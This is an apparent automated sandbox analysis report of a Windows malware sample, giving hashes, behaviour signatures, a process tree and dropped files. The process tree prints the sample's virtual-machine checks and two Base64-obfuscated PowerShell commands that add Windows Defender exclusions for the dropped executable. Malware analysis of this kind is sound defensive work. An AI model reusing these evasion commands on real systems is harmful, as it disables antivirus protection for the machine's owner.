Analysis

  • max time kernel
    121s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    13-10-2024 01:39

General

  • Target

    ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af.exe

  • Size

    22.2MB

  • MD5

    f975ef6b34160bff3ba3c8c815f9e77c

  • SHA1

    4b818a41b68f8ed6f6719db14e19f955a60aebe8

  • SHA256

    ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af

  • SHA512

    ba08c564b363affea6c39394955feb327a6c15cde9a5b83806088fcfdb4b4464deb24dcbca0e2cb5f26ae9172d7c8fb94ed58e0a534bf21deb4957363f67a222

  • SSDEEP

    98304:XHE3AU4FiZ0ZXawT/2MMlOLG9ffkTj8cywcAk:U3u0Z0EdM1LGdUjKA

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af.exe
    "C:\Users\Admin\AppData\Local\Temp\ae04f1bc929f6f83a4010f59fcc1f78caea5d198ae3779c7e058608effcc56af.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\system32\reg.exe
      "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
      2⤵
        PID:1636
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" "computersystem" "get" "manufacturer"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cdGFjc29oa2VtcXJsbGVqbyI=')); Invoke-Expression $cmd"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cdGFjc29oa2VtcXJsbGVqb1xndmZtZm5mZGhqamtseGJzLmV4ZSI=')); Invoke-Expression $cmd"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2404
      • C:\Users\Admin\tacsohkemqrllejo\gvfmfnfdhjjklxbs.exe
        "C:\Users\Admin\tacsohkemqrllejo\gvfmfnfdhjjklxbs.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2780 -s 28
          3⤵
          • Loads dropped DLL
          PID:1676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      be8f84dc0696c597ec4ffa9d0ecf439f

      SHA1

      84b70f7dc2cda9ea84415f556208712d88268813

      SHA256

      b5fe494cb955de3d0b8b97e9d62d33d53c4f14200cf1617f00fafec9a87e57f4

      SHA512

      335d5b7aa64a37d1c30ef748e608bea903da010e4dd7052e51b238d43bf5360bda731e20eca1b7b5960b80a6e20e4ed15edcfdce76e21e8c67925f9fd6bd2156

    • \Users\Admin\tacsohkemqrllejo\gvfmfnfdhjjklxbs.exe

      Filesize

      2.6MB

      MD5

      0c01cfc0685211b3c655c7a9526f1849

      SHA1

      864d23804b6e3c98efd1b56863a484b505ddf40b

      SHA256

      8d6ee227c57e825bc978db47c7587d46e7df06e3656d493486ee26b1426c98a6

      SHA512

      6024a41f371d77a82608c0e8ff314853404a50decb77838ace61c43a72ef954f4a227849b85e2aa3ef0749120e8361f13145006652596fb22b2f972bf7585719

    • memory/2404-12-0x000000001B300000-0x000000001B5E2000-memory.dmp

      Filesize

      2.9MB

    • memory/2404-13-0x0000000002090000-0x0000000002098000-memory.dmp

      Filesize

      32KB

    • memory/2760-4-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2760-5-0x0000000002570000-0x0000000002578000-memory.dmp

      Filesize

      32KB

    • memory/2780-24-0x000000013FA60000-0x000000013FD06000-memory.dmp

      Filesize

      2.6MB